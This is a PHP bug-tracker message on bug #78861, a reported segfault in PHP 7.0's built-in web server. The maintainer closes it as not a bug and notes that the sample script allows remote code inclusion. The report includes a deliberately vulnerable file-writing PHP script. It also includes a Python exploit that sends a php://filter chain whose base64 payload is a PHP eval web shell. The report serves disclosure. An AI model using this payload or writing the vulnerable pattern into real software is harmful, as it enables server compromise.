Sec Bug->Bug #78861 [Csd->Nab]: [DoS] Segmentation fault through HTTP Requests by string strip_tags

From: Date: Fri, 13 Dec 2019 15:01:11 +0000
Subject: Sec Bug->Bug #78861 [Csd->Nab]: [DoS] Segmentation fault through HTTP Requests by string strip_tags
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-224275@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=78861&edit=1

 ID:                 78861
 Updated by:         cmb@php.net
 Reported by:        jessica1123 at yeah dot net
 Summary:            [DoS] Segmentation fault through HTTP Requests by
                     string strip_tags
-Status:             Closed
+Status:             Not a bug
-Type:               Security
+Type:               Bug
 Package:            *Web Server problem
 Operating System:   Ubuntu 16.04
 PHP Version:        7.1.33
 Assigned To:        cmb
 Block user comment: N
 Private report:     Y

 New Comment:

Well, thanks to Remi, I had a closer look at this issue, and the
given script is vulnerable to RCI anyway (unrelated to the
segfault which may happen on older PHP versions), because the name
of the file to be written to is not validated.


Previous Comments:
------------------------------------------------------------------------
[2019-12-06 13:24:02] jessica1123 at yeah dot net

It actually affects other web servers, such as php-fpm. But since you no longer maintain php7.0,
there is nothing you need to do .

------------------------------------------------------------------------
[2019-12-01 04:22:08] php-bugs at lists dot php dot net

No feedback was provided. The bug is being suspended because
we assume that you are no longer experiencing the problem.
If this is not the case and you are able to provide the
information that was requested earlier, please do so and
change the status of the bug back to "Re-Opened". Thank you.

------------------------------------------------------------------------
[2019-11-23 09:17:22] cmb@php.net

> I found a vulnerability while I was testing the PHP built-in web
> server.

Since the built-in Web server should not be used on a public
network[1], security concerns do not apply.

Or can this be reproduced with other Web servers as well?

> My environment is php 7.0.33 , but the problem doesn't work on
> 7.1.33

We do no longer support PHP 7.0; if PHP 7.1 and higher are not
affected by this issue, this would not even be a bug for php.net.

[1] <https://www.php.net/manual/en/features.commandline.webserver.php>

------------------------------------------------------------------------
[2019-11-23 03:44:22] jessica1123 at yeah dot net

Description:
------------
Description:
------------
Hi,

I found a vulnerability while I was testing the PHP built-in web server.
The vulnerability could be exploited by an attacker to crash the server causing a segmentation
fault.

I think this vulnerability is caused by an error when file_put_contents parses
php://filter/write=string.strip_tags . 

My environment is php 7.0.33 , but the problem doesn't work on 7.1.33

root@1B40116:~/php# php -v
PHP 7.0.33-0ubuntu0.16.04.7 (cli) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
    with Zend OPcache v7.0.33-0ubuntu0.16.04.7, Copyright (c) 1999-2017, by Zend Technologies

The steps to reproduce to trigger the segmentation fault are the following:

$ mkdir php
$ cd php
$ touch phpshell.php
#wtrie php code to phpshell.php
```
<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);
```

$ php -S 0:8081
$ python exploit.py 127.0.0.1 #But could be a remote server as well

You can find the exploit in the "Test script" section.

Further investigations of the issue could lead an attacker to exploit the memory corruption in the
server to get a reverse shell (eg. Buffer overflow).
Anyway, with the actual exploit an attacker could already DoS the server.

Test script:
---------------
import sys
import requests

if len(sys.argv) < 2:
    print("[!] Usage: %s TARGET" % sys.argv[0])
    exit()

target = sys.argv[1].strip()

url = "http://{ip}:8081/phpshell.php".format(ip
= target)

data = {
   
"filename":r"php://filter/write=string.strip_tags|convert.base64-decode/resource=bb.php&txt=PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pPz4="
}

print("[*] Sending requests to %s." % target)
try:
    r = requests.post(url = url , data = data)
    print("The exploit didn't worked.")
except requests.exceptions.ConnectionError:
    print("The exploit worked!")

Expected result:
----------------
The server crash with "Segmentation fault" error.


Test script:
---------------
import sys
import requests

if len(sys.argv) < 2:
    print("[!] Usage: %s TARGET" % sys.argv[0])
    exit()

target = sys.argv[1].strip()

url = "http://{ip}:8081/phpshell.php".format(ip
= target)

data = {
   
"filename":r"php://filter/write=string.strip_tags|convert.base64-decode/resource=bb.php&txt=PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pPz4="
}

print("[*] Sending requests to %s." % target)
try:
    r = requests.post(url = url , data = data)
    print("The exploit didn't worked.")
except requests.exceptions.ConnectionError:
    print("The exploit worked!")

Expected result:
----------------
output:
The exploit didn't worked.

Actual result:
--------------
python output:
The exploit worked!

shell output:
Segmentation fault


------------------------------------------------------------------------



--
Edit this bug report at https://bugs.php.net/bug.php?id=78861&edit=1


Thread (1 message)

  • cmb@php.net
  • Unknown Message
    • cmb@php.net
« previous php.bugs (#224275) next »